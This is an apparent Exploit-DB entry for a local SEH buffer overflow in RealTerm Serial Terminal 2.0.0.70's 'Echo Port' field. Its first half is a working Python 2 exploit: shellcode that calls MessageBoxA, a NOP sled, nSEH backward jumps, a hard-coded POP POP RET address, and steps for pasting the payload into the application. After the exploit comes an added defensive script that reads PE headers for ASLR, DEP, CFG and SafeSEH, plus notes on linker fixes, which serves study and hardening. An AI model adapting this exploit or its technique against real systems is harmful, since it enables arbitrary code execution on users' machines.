RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)

21 Feb 2019. Reported by Matteo Malvica. Type: exploitdb. Source: www.exploit-db.com


Code
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH)
# Date: 21.02.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version: 2.0.0.70
# Category: Local
# Contact: https://twitter.com/matteomalvica
# Tested on: Windows 7 SP1 x64
# Original PoC https://www.exploit-db.com/exploits/46391

# 1.- Run the python script  it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Box!

# Python 2 script: the payload is built from byte-valued str literals.

import struct

'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
# Proof-of-concept payload: calls MessageBoxA through an address hard-coded
# for the author's Windows 7 SP1 user32.dll (changes per build/reboot with ASLR).
shellcode = (
"\x33\xc0"                          # XOR EAX,EAX
"\x50"                              # PUSH EAX      => padding for lpCaption
"\x68\x7a\x6f\x21\x21"              # PUSH "zo!!"
"\x68\x61\x76\x61\x6e"              # PUSH "avan"
"\x8B\xCC"                          # MOV ECX,ESP   => PTR to lpCaption
"\x50"                              # PUSH EAX      => padding for lpText
"\x68\x6e\x7a\x6f\x21"              # PUSH "nzo!"
"\x68\x61\x76\x61\x21"              # PUSH "ava!"
"\x8B\xD4"                          # MOV EDX,ESP   => PTR to lpText
"\x50"                              # PUSH EAX - uType=0x0
"\x51"                              # PUSH ECX - lpCaption
"\x52"                              # PUSH EDX - lpText
"\x50"                              # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74"              # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6")                         # CALL ESI

pad1 = "\x90" * (142 - len(shellcode))   # NOP sled so shellcode ends at a fixed offset
pad2 = "\x42" * 118                      # filler up to the SEH record
nseh = "\xEB\x80\x90\x90"                # next SEH: JMP SHORT -0x80 (backwards)
jmp_back = "\xEB\x80\x90\x90"            # second backward jump landing in the sled
seh = struct.pack('<L', 0x00406e27)      # 0x00406e27: POP POP RET
nops = "\x90\x90\x90\x90"
payload = pad1 + shellcode + nops + jmp_back + pad2 + nseh + seh


try:
    f = open("carbonara.txt", "w")
    print "[+] Creating %s bytes pasta payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] Carbonara created!"

except:
    print "Carbonara cannot be created"
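The PoC above depends on two things a hardened build would deny it: an exception-handler pointer (`POP POP RET` at 0x00406e27, an address in the range where a non-relocated main executable normally loads, which is an inference from the value rather than something the page states) that stays fixed and is not rejected by SafeSEH, and a `user32.dll` address resolved once with arwin. The following script is an added example, not part of the original exploit or of RealTerm, that reads the PE headers the loader consults for exactly these properties: `DllCharacteristics` (ASLR, DEP, CFG, NO_SEH) and whether a Load Config directory, where a SafeSEH handler table would live, exists at all. Offsets follow the PE/COFF specification; the two in-memory samples are constructed for the demonstration, and `build_minimal_pe` is a hypothetical helper that emits headers only, not a loadable program.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DYNAMIC_BASE = 0x0040   # image may be relocated: ASLR opt-in
NX_COMPAT = 0x0100      # DEP/NX opt-in
NO_SEH = 0x0400         # image registers no SEH handlers at all
GUARD_CF = 0x4000       # Control Flow Guard

LOAD_CONFIG_DIR_INDEX = 10   # data directory that holds SEHandlerTable/Count


def parse_pe_headers(data):
    """Return (pe32plus, dll_characteristics, load_config_rva) for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                 # COFF file header is 20 bytes
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:                      # PE32
        pe32plus, n_dirs_off, dirs_off = False, opt + 92, opt + 96
    elif magic == 0x20B:                    # PE32+
        pe32plus, n_dirs_off, dirs_off = True, opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    (n_dirs,) = struct.unpack_from("<I", data, n_dirs_off)
    load_config_rva = 0
    if n_dirs > LOAD_CONFIG_DIR_INDEX:
        load_config_rva, _size = struct.unpack_from(
            "<II", data, dirs_off + 8 * LOAD_CONFIG_DIR_INDEX)
    return pe32plus, dll_chars, load_config_rva


def check_mitigations(data):
    """Summarise the opt-in mitigations recorded in the headers."""
    pe32plus, flags, lc_rva = parse_pe_headers(data)
    return {
        "pe32plus": pe32plus,
        "aslr": bool(flags & DYNAMIC_BASE),
        "dep": bool(flags & NX_COMPAT),
        "no_seh": bool(flags & NO_SEH),
        "cfg": bool(flags & GUARD_CF),
        # No Load Config directory means no SafeSEH table can exist; when one
        # is present, SEHandlerTable inside it still has to be inspected.
        "load_config_present": lc_rva != 0,
    }


def build_minimal_pe(dll_characteristics, load_config_rva=0):
    """Constructed sample (hypothetical helper): DOS header + PE32 headers, no sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)           # e_lfanew -> right after DOS header
    opt = bytearray(224)                             # 96-byte PE32 header + 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)            # Magic: PE32
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR_INDEX,
                     load_config_rva, 0x40 if load_config_rva else 0)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def main(argv):
    if len(argv) > 1:                                # real binary supplied on the command line
        with open(argv[1], "rb") as fh:
            samples = [(argv[1], fh.read())]
    else:                                            # constructed samples
        samples = [
            ("legacy build, no opt-ins (constructed)", build_minimal_pe(0)),
            ("hardened build (constructed)",
             build_minimal_pe(DYNAMIC_BASE | NX_COMPAT | GUARD_CF, load_config_rva=0x3000)),
        ]
    for name, data in samples:
        print(name, check_mitigations(data))


if __name__ == "__main__":
    main(sys.argv)
```

Run it without arguments to see the two constructed profiles, or pass a path to a real executable. A report with `aslr` false is what makes a fixed `POP POP RET` address reusable across machines, and `load_config_present` false rules out SafeSEH for a 32-bit image; the fix on the vendor side is the usual linker opt-ins (`/DYNAMICBASE`, `/NXCOMPAT`, `/SAFESEH`) plus bounds-checking the port field before it is copied.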
